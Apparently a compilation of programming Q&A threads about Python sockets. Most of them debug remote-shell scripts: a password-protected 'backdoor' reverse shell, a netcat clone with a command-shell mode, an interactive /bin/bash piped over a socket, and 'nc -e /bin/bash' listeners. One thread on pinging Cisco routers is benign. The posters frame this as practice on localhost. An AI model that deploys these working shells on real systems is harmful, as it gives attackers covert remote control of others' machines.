Backdoor Shell doesn't allow me to change Directory - python

Below is a Python script which establishes a connection to my machine on port 1234. Using netcat I can listen on that port and then perform actions on my machine through the terminal (I know this is trivial, but it's just for practice).
The problem is that commands like "ls", "mkdir", "pwd", "rm", or even "ls /root/Desktop/" work, but "cd /root/Desktop" and "cd .." do not. Typing "cd .." returns no error message, but it also doesn't change the directory, so I can never leave the directory the script was started in.
Here is the script:
#! /usr/bin/python
import socket
import subprocess

host = "localhost"
port = 1234
passwd = "hacking"

def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)
    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024)
        if data.strip() == ":kill":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
I got the script from here.
Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!

It actually works fine. Try this as a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command gets a fresh environment (so it starts back in the original directory). If you really want to change the "server context" between commands, you need to do that in Python itself. Below is a quick-and-dirty example added onto the code you provided:
#! /usr/bin/python
import socket
import subprocess
import os

host = "localhost"
port = 12345
passwd = "hacking"

def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)
    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024).strip()
        if data == ":kill":
            break
        try:
            cmd, params = data.split(" ", 1)
            if cmd == ":chdir":
                os.chdir(params)
                print "chdir to %s" % (params)
                s.send("#> ")
                continue
        except:
            pass
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
Same idea as your ":kill" command: if the script sees ":chdir /new/directory", Python calls os.chdir itself; otherwise the line is passed on to Popen.
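If you would rather type plain cd commands on the netcat side instead of a special ":chdir" keyword, the same trick can intercept "cd" directly. This is only a sketch built on the snippet above, not part of the original answer; the fallback to the home directory for a bare "cd" is an assumption:
def shell():
    while True:
        data = s.recv(1024).strip()
        if data == ":kill":
            break
        # Intercept "cd" and change the script's own working directory,
        # so the new directory persists for the commands that follow.
        if data == "cd" or data.startswith("cd "):
            target = data[3:].strip() or os.path.expanduser("~")
            try:
                os.chdir(target)
            except OSError as e:
                s.send(str(e) + "\n")
            s.send("#> ")
            continue
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")
Every later command then runs from the directory the script last changed into, which is exactly what the question was missing.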

Related

Python netcat not returning command shell

The code below is meant to copy the features of netcat for instances where netcat is removed from a server but python is not. However, no matter what I try I can't seem to figure out the following problem:
I run the following
./Netcat.py -l -p 9999 -c
followed by
./Netcat.py -t localhost -p 9999
in a separate terminal. I can confirm that, when acting as a server, the script does indeed receive a connection from the second instance and that it receives data when it is sent (upon pressing CTRL+D). However, I then get a hung terminal which does not receive a command prompt back, nor can it send more data. I am hoping someone can point out the error.
What should happen is as follows:
1. Spin up a server instance.
2. Run the script as a client.
3. Type some data and close STDIN with CTRL+D, at which point the client sends the data to the server.
4. The server should then receive the data and send back a command prompt to the client.
The problem is at step 4 and I'm pulling my hair out at this point.
Edit
Having run strace, I determined that the client program gets hung up waiting to receive data; I have marked the corresponding line in the code. I do not see why this would be the case.
import sys                 # used for accessing command line args
import socket              # creation of socket objects to listen & send/receive data
import getopt              # helps scripts to parse the command line arguments in sys.argv
import concurrent.futures  # for running commands in a subshell
import subprocess          # The subprocess module allows you to spawn new processes, connect to their input/output/error pipes, and obtain their return codes.

## Globals ##
listen = False
command = False
target = ""
port = 0
## END GLOBALS ##

def client_sender(buffer):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(buffer):
            # bytes([source[, encoding[, errors]]])
            client.send(bytes(buffer, 'utf-8'))
        # continue sending and receiving data until user kills script
        while True:
            recv_len = 1
            response = ''
            while recv_len:
                data = client.recv(4096)  # <-- PROBLEM
                recv_len = len(data)
                response += data.decode('utf-8')
                if recv_len < 4096:
                    break
            print(response)
            buffer = input('#: ')
            buffer += '\n'
            client.send(bytes(buffer, 'utf-8'))  # sockets expect bytes, not str
    except socket.error as e:
        print('[*] Exception! Exiting')
        print(e)
        client.close()

def server_loop():
    global target
    global port
    # if no target is defined, listen on all interfaces
    if not len(target):
        target = '0.0.0.0'
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    print(f'listening on {target}:{port}')
    while True:
        client_socket, addr = server.accept()
        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            executor.submit(client_handler, client_socket)

def run_command(command):
    command = command.rstrip()
    # run command & retrieve output
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except:
        return b'Failed to execute command.\r\n'
    return output  # check_output already returns bytes

def client_handler(client_socket):
    global command
    # check if shell requested
    if command:
        while True:
            client_socket.send(b'<BHP:#> ')
            # receive until linefeed
            cmd_buffer = b''
            while b'\n' not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)
            response = run_command(cmd_buffer.decode('utf-8'))
            client_socket.send(response)

def main():
    global listen
    global port
    global command
    global target
    # make sure the user provided options & arguments
    if not len(sys.argv[1:]):
        usage()
    # parse commandline options
    try:
        opts, args = getopt.getopt(sys.argv[1:], "lt:p:c",  # ':' follows options which expect an argument
                                   ['listen', 'target', 'port', 'command'])
    except getopt.GetoptError as err:
        print(str(err))
        usage()
    # handle commandline options
    for option, argument in opts:
        if option in ('-l', '--listen'):
            listen = True
        elif option in ('-e', '--execute'):
            execute = argument
        elif option in ('-c', '--commandshell'):
            command = True
        elif option in ('-t', '--target'):
            target = argument
        elif option in ('-p', '--port'):
            port = int(argument)
    # not listening; sending data from stdin
    if not listen and len(target) and port > 0:
        buffer = sys.stdin.read()
        client_sender(buffer)
    if listen:
        server_loop()

if __name__ == '__main__':
    main()

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results back; I have that working already. I also don't want to abstract single-command execution by having the server interpret directory changes or the like.
I am trying to have the client start an interactive /bin/bash and have the server send commands which are then executed by that same persistent shell. For instance, if I run cd /foo/bar, then pwd would return /foo/bar, because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))
while True:
    cmd = s.recv(1024)
    # single command execution currently (not interactive shell)
    results = subprocess.Popen(cmd, shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
    results = results.stdout.read() + results.stderr.read()
    s.sendall(results)

# server.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
    cmd = raw_input('> ').rstrip()
    conn.send(cmd)
    results = conn.recv(4096)
    print results
I've tried many solutions, none of which have worked. The subprocess module has a communicate method, but it kills the shell after a single command. I'd really like to accomplish this with the stdlib, but I also looked at the pexpect module after reading this thread, and I can't get that to work either. Its primary use case doesn't seem to be creating an interactive shell, but rather catching specific command-line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys

proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated. I feel like there could be a way to multi-thread this: spawn off a /bin/bash -i with subprocess and then somehow write to its stdin and read from its stdout. Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
                           stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
                           stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
import subprocess
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
# 'cat' prints everything the remote bash writes to the socket
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
    # forward whatever is typed locally to the remote shell
    fp.write(sys.stdin.read(4096))
    fp.flush()
proc1.wait()
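For what it's worth, the thread-based idea mentioned at the end of the question (spawn /bin/bash -i yourself and shuttle bytes between its pipes and the socket) can also be made to work. The following is only a rough sketch of that approach, not part of the original answer; the file name and structure are illustrative:
# client_threaded.py  (illustrative name)
import socket
import subprocess
import threading

s = socket.socket()
s.connect(('localhost', 1337))

# One persistent bash; -i keeps it interactive, so "cd" and the like persist.
proc = subprocess.Popen(['/bin/bash', '-i'],
                        stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT)

def pump_output():
    # copy bash's output to the socket, one byte at a time to avoid buffering stalls
    while True:
        byte = proc.stdout.read(1)
        if not byte:
            break
        s.sendall(byte)

threading.Thread(target=pump_output).start()

while True:
    cmd = s.recv(1024)
    if not cmd:
        break
    proc.stdin.write(cmd)   # note: bash only runs a line once it sees '\n'
    proc.stdin.flush()
The server from the question would just need to append '\n' to each command it sends so bash actually executes the line.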

socket can't communicate with netcat bash

On a VM I ran the command nc -l -p 8221 -e /bin/bash and wrote this Python 3 script:
import socket
import time

def netcat():
    print ("starting connection")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.60", 8221))
    while True:
        user = input("what to send?: ")
        s.sendall(bytes(user, "utf-8"))
        time.sleep(5)
        word = "bob"
        data = s.recv(4096)
        if data == b"":
            pass
        else:
            data = data.decode("utf-8")
            print ("Received:", repr(data))
    print ("Connection closed.")
    s.shutdown(socket.SHUT_WR)
    s.close()

netcat()
This script doesn't work. By "doesn't work" I mean that when I send a command with my Python script, let's say "pwd", it just hangs and the command never runs.
When I instead run nc 192.168.1.60 8221, it works fine. Any ideas why?
From input()'s documentation:
The function then reads a line from input, converts it to a string
(stripping a trailing newline), and returns that.
But bash reads commands line by line and won't process the input until a newline arrives. That newline is never sent, so recv blocks forever.
Append a '\n' to the value returned by input("what to send?: ") to fix it.
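In other words, a minimal illustration of that one-line change in the loop above:
user = input("what to send?: ") + "\n"   # trailing newline so bash executes the line
s.sendall(bytes(user, "utf-8"))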

Python: Execute a command in Cisco Router on successful ping else print error

The following code fetches IP addresses (Cisco routers) from a text file, executes the mentioned command, and writes the resulting output to a file. I am trying to first test the reachability of each device with a ping: on a successful ping response the commands should be executed, otherwise it should print an error and move on to the next host. Please help me with how to achieve this. I am a newbie.
Here is my code,
import paramiko
import sys
import os
import subprocess

with open('C:\Python27\Testing\Fetch.txt') as f:
    for line in f:
        line = line.strip()
        dssh = paramiko.SSHClient()
        dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        dssh.connect(line, username='cisco', password='cisco')
        stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
        mystring = stdout.read()
        print mystring
        f = open('C:\Python27\Testing\output.txt', 'a+')
        f.write(mystring)
        f.close()
        dssh.close()
Input file Fetch.txt looks like this,
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.5
I scoured the forum and achieved just about what I am looking for. If all the IP addresses in the list are reachable, the script works just fine. But if any one of the IP addresses is unreachable, the script ends abruptly without proceeding to the next IP address. I realize I am doing something wrong here; I just need that little bit of help to get this working. Please help out.
import paramiko
import sys
import os
import subprocess

dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
with open('C:\Python27\Testing\Fetch.txt') as f:
    for line in f:
        line = line.strip()
        with open(os.devnull, "wb") as limbo:
            ip = line
            result = subprocess.Popen(["ping", "-n", "1", "-w", "200", ip],
                                      stdout=limbo, stderr=limbo).wait()
            if result:
                print ip, "Down"
            else:
                print ip, "Reachable"
                dssh.connect(line, username='cisco', password='cisco')
                stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
                mystring = stdout.read()
                print mystring
                f = open('C:\Python27\Testing\output.txt', 'a+')
                f.write('\n' + ip + '\n' + mystring)
                f.close()
                dssh.close()
You ideally don't have to test whether a host is pingable first with a separate if statement. paramiko comes with a lot of built-in exception handling; using it along with the socket module, your program can be written in a cleaner fashion without having to use subprocesses:
import paramiko
import socket

dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ips = [i.strip() for i in open("C:\Python27\Testing\Fetch.txt")]  # creates a list from the input file
for ip in ips:
    try:
        dssh.connect(ip, username='cisco', password='cisco', timeout=4)
        stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
        print ip + '===' + stdout.read()
        dssh.close()
    except paramiko.AuthenticationException:
        print ip + '=== Bad credentials'
    except paramiko.SSHException:
        print ip + '=== Issues with ssh service'
    except socket.error:
        print ip + '=== Device unreachable'
This will also catch other problems, such as bad credentials or issues with the SSH service.
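If you also want the results appended to the output file as in the original script, rather than only printed, the same loop can be extended. This is just a sketch combining the answer above with the question's own output.txt handling:
import paramiko
import socket

dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ips = [i.strip() for i in open("C:\Python27\Testing\Fetch.txt")]
for ip in ips:
    try:
        dssh.connect(ip, username='cisco', password='cisco', timeout=4)
        stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
        output = stdout.read()
        print ip + '===' + output
        # append the result to the same output file the original script used
        out = open('C:\Python27\Testing\output.txt', 'a+')
        out.write('\n' + ip + '\n' + output)
        out.close()
        dssh.close()
    except paramiko.AuthenticationException:
        print ip + '=== Bad credentials'
    except paramiko.SSHException:
        print ip + '=== Issues with ssh service'
    except socket.error:
        print ip + '=== Device unreachable'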
You could try using Fabric, which is made for executing SSH commands on multiple machines.
This is just a snippet I threw together, but it should show you the way to go.
from fabric.api import run, execute, env

class Fetcher:
    def __init__(self, hosts=[]):
        env.hosts = hosts
        env.warn_only = True  # needed to not abort on ping timeout or other errors

    def getclock(self):
        run('sh clock')

    def fetch(self):
        results = execute(self.getclock, hosts=env.hosts)

if __name__ == '__main__':
    hosts = [h.strip() for h in open('hosts.txt')]  # load the host list from a text file
    f = Fetcher(hosts=hosts)
    f.fetch()
I recall an example of Python threading, either in the docs or in a book I read (I don't remember the source), that does something like what you're trying to do. Something like this should work:
import sys
import os
import subprocess
from threading import Thread

class Pinger(Thread):
    def __init__(self, ip):
        Thread.__init__(self)
        self.ip = ip
        self.status = False

    def __repr__(self):
        return "Pinger for '%s' status '%s'" % (self.ip, self.status)

    def run(self):
        with open(os.devnull, "wb") as limbo:
            # Changed the arguments because I don't have a Windows ping.exe to test on
            result = subprocess.Popen(["ping", "-c", "2", "-q", self.ip],
                                      stdout=limbo, stderr=limbo).wait()
            if result:
                # print self.ip, "Down"
                self.status = False
            else:
                # print self.ip, "Reachable"
                self.status = True

hosts = []
with open('Fetch.txt') as f:
    for line in f:
        host = Pinger(line.rstrip())
        # print host
        hosts.append(host)
        host.start()

for host in hosts:
    host.join()
    if host.status:
        print "Host '%s' is up" % host.ip
        #### Insert your ssh exec code here ####
        # dssh.connect(host.ip, username='cisco', password='cisco')
        # etc.
    else:
        print "Host '%s' is down" % host.ip
Why do you need the paramiko module, or an input file at all, if Python can do it by itself?
#!/usr/bin/python
import os

hostname = raw_input('Enter the Router Name: ')
routers = hostname.split(',')
print routers
for hostname in routers:
    response = os.system("ping -c5 " + hostname)
    if response == 0:
        print hostname, 'is up!'
    else:
        print hostname, 'is down!'

Send output from a python server back to client

I now have a small server working correctly; it is called by:
<?php
$handle = fsockopen("udp://78.129.148.16",12345);
fwrite($handle,"vzctlrestart110");
fclose($handle);
?>
On a remote server, the following Python server is running and executing the commands:
#!/usr/bin/python
import os
import socket

print " Loading Bindings..."
settings = {}
line = 0
for each in open('/root/actions.txt', 'r'):
    line = line + 1
    each = each.rstrip()
    if each != "":
        if each[0] != '#':
            a = each.partition(':')
            if a[2]:
                settings[a[0]] = a[2]
            else:
                print " Err # line", line, ":", each
print " Starting Server...",
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
print "OK."
print " Listening on port:", port
while True:
    datagram = s.recv(1024)
    if not datagram:
        break
    print "Rx Cmd:", datagram
    if settings.has_key(datagram):
        print "Launch:", settings[datagram]
        os.system(settings[datagram]+" &")
s.close()
Is it possible to easily send the output of the command back? When the server is running a command, the output is shown in the SSH window, but I want that output sent back to the browser of the original client, perhaps by making the browser wait 15 seconds and then check for any data received via the socket.
I know I am asking quite a lot. I am writing the PHP side, which I know well, but my Python knowledge is greatly lacking.
Thanks,
Ashley
Yes, you can read the output of the command. For this I would recommend the Python subprocess module; then you can just send it back over the socket.
Naturally this has some implications: you would probably have to let your PHP script wait a while longer, since the command may run slowly.
from subprocess import Popen, PIPE

# The pipe behaves like a file object in Python.
process = Popen(cmd, shell=True, stdout=PIPE)
process_output = ""
while process.poll() is None:           # poll() returns None while the process is still running
    process_output += process.stdout.read(256)
s.send(process_output)

# Better yet:
process = Popen(cmd, shell=True, stdout=PIPE)
stdout, stderr = process.communicate()  # reads all output and waits for the process to end
s.send(stdout)
Integrated into your code:
# ... snip ...
import subprocess

while True:
    # recvfrom also tells us the client's address so we can reply (UDP sockets have no accept())
    datagram, addr = s.recvfrom(1024)
    if not datagram:
        break
    print "Rx Cmd:", datagram
    if settings.has_key(datagram):
        print "Launch:", settings[datagram]
        # no trailing "&" here: the command must run in the foreground so its output can be captured
        process = subprocess.Popen(settings[datagram], shell=True, stdout=subprocess.PIPE)
        stdout, stderr = process.communicate()
        s.sendto(stdout, addr)
s.close()
Here's an example of how to get the output of a command:
>>> import commands
>>> s = commands.getoutput("ls *")
>>> s
'client.py'
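Note that the commands module is Python 2 only; on Python 3 the equivalent one-liner is subprocess.getoutput:
>>> import subprocess
>>> s = subprocess.getoutput("ls *")
>>> s
'client.py'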
